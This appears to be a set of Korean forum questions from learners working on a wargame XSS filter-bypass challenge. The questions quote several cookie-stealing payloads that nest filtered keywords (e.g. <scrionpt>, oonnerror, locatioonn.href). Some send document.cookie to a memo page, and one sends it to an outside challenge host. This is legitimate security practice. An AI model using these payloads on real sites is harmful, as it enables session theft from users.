XSS Filtering Bypass

script -> on -> javascript 순서로 검사를 진행해서 <script>는 <scrionpt>처럼 script 가운데에 on을 집어넣는 방식으로 우회가 가능했습니다. 그런데 왜 location.href는 locatiojavascriptn.href 처럼 o와 n 사이에 javascript를 넣어도 우회가 안되고 꼭 document['locatio'+'n']으로 우회해야 되나요? 코드는 아래 처럼 짰습니다. <scrionpt>locatiojavascriptn.href="/memo?memo="+document.cookie</sconript>

풀이 강의를 보기 전 아래와 같은 코드를 사용했는데 플래그 값이 아닌 hello만 적히는데 왜 그러는지 궁금합니다! <scrscriptipt>memo_text=document.cookie</scrscriptipt> 같은 맥락의 질문인 것 같은데 풀이 강의에서 location.href를 사용하는 이유가 뭔가요?

제가 생각한건 csp bypass에서 제공된 아래 문구로 기입했으나 실패하여 문의드립니다. <scronipt src="/vuln?param=locatioonn.href='/memo?memo='%2bdocument.cookie"></scrionpt>

<scrscriptipt>locatioonn.href=’/memo?memo=’ +document.cookie</scriscriptpt> 요런식으로 vuln페이지에서 잘 넘어가는거같던데 flag에 했을당시 hello로 뜨더라구요... 이유를 알수 있을까요??

안녕하세요 해당문제를 푼지도 시간이 오래되었는데 다시 다른방법으로 풀려고하니 아직좀 부족한 면이 많은걸 느끼네요 ㅎㅎ... 해당 문제에 다른 질문이 있어 여쭤보게되었습니다. 해당 문제에서 필터링을 "on", "script", "javascript" 이 세 단어를 필터링을 하고있는데, 해당 페이로드들을 입력했을시에 /vuln 페이지에서 alert()가 안뜨더라구요. <iframe%20src="\1\4jAVasC\triPT:alert(document.domain)"> (Not Found 404) 에러를 받았습니다. 혹시 이유를 알수 있을까 해서 질문 남깁니다! 감사합니다 ㅎㅎ

이 문제를 해결하는 방법으로 document.cookie 값을 다른 곳에 찍는 식으로 해결하는 것이 일반적인 방법인 것 같은데... 혹시 되나 싶어서 alert(document.cookie)로도 시도해 봤는데 요청은 가는 거 같은데 alert 창이 표시되지는 않네요ㅠㅠ 혹시 이유를 아시는 분이 있으실까여

location.href를 이용한 풀이에서 1번 <img src=1 oonnerror='locatioonn.href="http://host3.dreamhack.games:RANDOM_NUMBER/" + document.cookie' /> 2번 <img src=1 oonnerror='locatioonn.href="/memo?memo=" + document.cookie' /> 2번은 되는데 1번은 안되는 이유가 뭔지 알고 싶습니다.

`` <img src="" onerror="<scscriptript>...">`` ``<img src="<scscriptript>..." onerror=""> `` 왜 src속성에 하면 안되고 onerror 속성에 스크립트를 써야 되나여?? <img src="" oonnerror="locatioonn.href=+'/memo?memo='+document.cookie"> <img src="" oonnerror="locatioonn.href='/memo?memo='+document.cookie"> 두 코드의 차이점은 무엇인가요? +를 왜 뒤에만 붙여야 적용 되는건가요??